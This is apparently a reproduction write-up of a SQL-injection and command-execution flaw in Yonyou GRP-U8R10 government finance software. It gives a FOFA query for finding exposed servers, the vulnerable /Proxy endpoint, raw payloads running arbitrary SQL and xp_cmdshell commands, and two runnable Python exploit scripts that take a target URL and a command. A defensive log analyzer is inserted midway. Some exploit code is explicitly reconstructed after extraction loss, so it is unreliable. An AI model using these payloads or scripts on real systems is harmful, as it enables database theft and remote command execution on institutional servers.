This is a vulnerability I ran into at work; I reproduced it successfully by following earlier reproduction tutorials and am recording my own reproduction notes here. If this infringes any rights, please contact me to have it removed.
Yonyou GRP-U8R10 administrative and public-institution financial management software is a new-generation product launched by Yonyou, focused on national e-government and built on cloud computing technology, and is the most specialised government financial management software in China's administrative and public-institution finance sector.
This system was reported to contain an XXE vulnerability: when the application parses XML input it does not prohibit the loading of external entities, so malicious external files can be loaded. This ends in two consequences: first, SQL injection, i.e. arbitrary SQL statements are executed; second, command execution: when a user can control the parameters of a command-execution function, malicious system commands can be injected into the normal command, producing a command-execution attack.
FOFA search query: title="GRP-U8"
1. Use HackBar to send the request as a POST and capture the packet with Burp Suite;
Vulnerability location:
http://ip:port/Proxy
u8qx/Tindex.jsp
2. After capturing, modify the packet and insert the XML statement. Here a SQL statement is executed (the line breaks are not needed, the data just has to be there; I only formatted it for readability):
cVer=9.8.0&dp=
<R9PACKET version="1">
<DATAFORMAT>XML</DATAFORMAT>
<R9FUNCTION>
<NAME>AS_DataRequest</NAME>
<PARAMS><PARAM>
<NAME>ProviderName</NAME>
<DATA format="text">DataSetProviderData</DATA>
</PARAM><PARAM>
<NAME>Data</NAME>
<DATA format="text">select user,db_name(),host_name(),@@version</DATA>
</PARAM></PARAMS>
</R9FUNCTION>
</R9PACKET>
Command execution goes through the same request; only the Data parameter changes, calling xp_cmdshell instead of a query:
cVer=9.8.0&dp=
<R9PACKET version="1">
<DATAFORMAT>XML</DATAFORMAT>
<R9FUNCTION>
<NAME>AS_DataRequest</NAME>
<PARAMS><PARAM>
<NAME>ProviderName</NAME>
<DATA format="text">DataSetProviderData</DATA>
</PARAM><PARAM>
<NAME>Data</NAME>
<DATA format="text">exec xp_cmdshell 'dir'</DATA>
</PARAM></PARAMS>
</R9FUNCTION>
</R9PACKET>
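On the defender's side, the two packets above are easy to recognise in web-server or WAF logs: a POST to /Proxy whose dp parameter is an R9PACKET calling AS_DataRequest with the DataSetProviderData provider and SQL or shell text in the Data parameter. The following Python 3 analyzer is an added example (not code from the original post or from Yonyou); it parses captured request bodies into those fields and flags that combination. The benign body and the AS_Login function name it uses are constructed for contrast and not taken from the product.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Tokens that mark a query or shell command being pushed through the
# DataSetProviderData provider; tune the list to the environment's real traffic.
SQL_OR_CMD = re.compile(
    r"\b(select|insert|update|delete|exec|execute|xp_cmdshell)\b", re.I)

def analyze_proxy_body(body):
    """Classify one POST body sent to /Proxy.

    Returns None when the body carries no R9PACKET, otherwise a dict with the
    function name, provider, Data payload and a 'suspicious' verdict.
    """
    dp = parse_qs(body, keep_blank_values=True).get("dp", [""])[0]
    if "<R9PACKET" not in dp:
        return None
    try:
        # ElementTree does not resolve external entities, so the XXE vector the
        # write-up mentions cannot fire inside this analyzer.
        root = ET.fromstring(dp)
    except ET.ParseError:
        return {"function": None, "provider": None, "data": "",
                "suspicious": True, "reason": "malformed R9PACKET"}
    func = root.findtext("R9FUNCTION/NAME")
    fields = {p.findtext("NAME"): p.findtext("DATA")
              for p in root.iterfind("R9FUNCTION/PARAMS/PARAM")}
    provider, data = fields.get("ProviderName"), fields.get("Data") or ""
    hit = (func == "AS_DataRequest" and provider == "DataSetProviderData"
           and SQL_OR_CMD.search(data) is not None)
    return {"function": func, "provider": provider, "data": data, "suspicious": hit,
            "reason": "SQL/command text in DataSetProviderData request" if hit else ""}

# Constructed sample bodies: the first reproduces the packet shown above; the
# second is an invented benign-looking request (AS_Login is hypothetical).
MALICIOUS_BODY = ('cVer=9.8.0&dp=<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT>'
    '<R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME>'
    '<DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME>'
    '<DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM>'
    '</PARAMS></R9FUNCTION></R9PACKET>')
BENIGN_BODY = ('cVer=9.8.0&dp=<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT>'
    '<R9FUNCTION><NAME>AS_Login</NAME><PARAMS><PARAM><NAME>User</NAME>'
    '<DATA format="text">demo</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>')

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, analyze_proxy_body(body))
```

Feed it the raw POST bodies from access logs or a WAF capture; a malformed R9PACKET is also reported, since a parser error is what an XXE or injection probe often looks like from the outside.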
GRP-U8_SQLinjection_POC
#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

if len(sys.argv) != 3:
    print "Usage: python poc.py url sql"
    sys.exit(1)

url = sys.argv[1]
sql = sys.argv[2]
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
}

def poc(url, sql):
    url = url + '/Proxy'
    print url
    # Same R9PACKET body as the captured request above; the XML tags were lost in
    # extraction and are restored here from that packet
    data = ('cVer=9.8.0&dp=<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT>'
            '<R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME>'
            '<DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME>'
            '<DATA format="text">' + sql + '</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>')
    res = requests.post(url, headers=headers, data=data)
    res = res.text
    # The original pattern was lost in extraction; this one is an assumption that
    # matches the <ROW .../> elements carrying the result set in the response
    result_row = r'<ROW\b[^>]*/?>'
    ROW = re.findall(result_row, res, re.S | re.M)
    if not ROW:
        print 'No result rows in response'
        sys.exit(1)
    print '查询成功!'
    print ROW[0]

if __name__ == "__main__":
    poc(sys.argv[1], sys.argv[2])
GRP-U8_SQLinjection_EXP
#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

if len(sys.argv) != 3:
    print "Usage: python exp.py url cmd"
    sys.exit(1)

url = sys.argv[1]
cmd = sys.argv[2]
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
}

def exp(url, cmd):
    url = url + '/Proxy'
    print url
    # Same R9PACKET body as the second captured request above, with the command
    # wrapped in xp_cmdshell; the XML tags were lost in extraction and are restored
    data = ('cVer=9.8.0&dp=<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT>'
            '<R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME>'
            '<DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME>'
            '<DATA format="text">exec xp_cmdshell \'' + cmd + '\'</DATA></PARAM></PARAMS>'
            '</R9FUNCTION></R9PACKET>')
    res = requests.post(url, headers=headers, data=data)
    res = res.text
    # The original pattern was lost in extraction; this one is an assumption that
    # matches the <ROW .../> elements carrying each output line in the response
    result_row = r'<ROW\b[^>]*/?>'
    ROW = re.findall(result_row, res, re.S | re.M)
    if not ROW:
        print 'No result rows in response'
        sys.exit(1)
    print '命令执行成功!'
    for row in ROW:
        print row

if __name__ == "__main__":
    exp(sys.argv[1], sys.argv[2])
https://blog.csdn.net/weixin_44146996/article/details/109863346